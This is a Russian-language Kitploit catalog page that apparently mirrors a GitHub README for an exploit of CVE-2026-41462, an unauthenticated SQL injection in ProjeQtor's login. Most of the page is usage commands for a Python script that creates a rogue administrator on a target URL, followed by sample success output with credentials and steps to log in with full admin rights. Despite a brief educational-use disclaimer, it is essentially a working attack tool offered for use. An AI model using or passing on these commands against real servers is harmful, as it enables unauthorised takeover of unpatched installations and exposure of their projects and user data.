Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-41462 — CVE-2026-41462 | Kitploit
Инструменты/GitHubGitHub/0xblackash/cve-2026-41462
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHub0xblackash/cve-2026-41462

CVE-2026-41462

CVE-2026-41462

Репозиторий
134 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 CVE-2026-41462 - Неаутентифицированная SQL-инъекция в ProjeQtor

projeqtor_cover

Критическая неаутентифицированная SQL-инъекция в ProjeQtor ≤ 12.4.3

Critical CVSS 9.8 Unauthenticated

📌 Обзор

CVE-2026-41462 — это критическая неаутентифицированная SQL-инъекция в функциональности входа в систему инструмента управления проектами ProjeQtor.

  • CVE ID: CVE-2026-41462
  • Затронутые версии: ProjeQtor 7.0 — 12.4.3
  • Исправленная версия: 12.4.4
  • Серьёзность: Критическая (CVSS 9.8)
  • Тип: Неаутентифицированная пакетная SQL-инъекция

🛠️ Эксплуатация

Использование

root@kitploit:~
python3 CVE-2026-41462.py -u http://target.com --create-admin

# With custom credentials
python3 CVE-2026-41462.py -u http://target.com --create-admin \
  --username admin123 --password StrongPass2026!
Скачать инструмент

📊 Что вы увидите, если всё сработает

При успешном выполнении эксплойта вы увидите вывод, похожий на этот:

root@kitploit:~
[+] Targeting: http://target.com
[+] Sending payload to create admin user 'hacker' ...
[+] Request sent successfully.
[+] New admin created → Username: hacker | Password: Admin123!
[+] Try logging in at: http://target.com/login.php

После запуска эксплойта:

  1. Откройте браузер и перейдите по адресу:
    http://target.com/login.php

  2. Войдите, используя учётные данные, показанные в выводе скрипта.

  3. При успехе вы попадёте в административную панель ProjeQtor с полными правами администратора.

Признаки успеха:

  • Вы можете просматривать все проекты, пользователей и системные настройки
  • Вы можете создавать/редактировать/удалять проекты без ограничений
  • Новый пользователь появляется в разделе управления пользователями

📁 Содержимое репозитория

ФайлОписание
CVE-2026-41462.pyОсновной скрипт эксплуатации
CVE-2026-41462.yamlШаблон обнаружения для Nuclei
README.mdЭта документация

🚀 Быстрый старт

  1. Клонируйте репозиторий:

    root@kitploit:~
    git clone https://github.com/0xBlackash/CVE-2026-41462.git
    cd CVE-2026-41462
    
  2. Запустите эксплойт:

    root@kitploit:~
    python3 CVE-2026-41462.py -u http://target.com --create-admin
    
  3. Войдите с помощью только что созданной учётной записи администратора.


⚠️ Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и авторизованного тестирования на проникновение. Несанкционированное использование незаконно.


📄 Ссылки

  • NVD - CVE-2026-41462
  • Официальный патч ProjeQtor (v12.4.4+)

Ответственное раскрытие • Только этичный хакинг
Будьте осторожны. Тестируйте легально.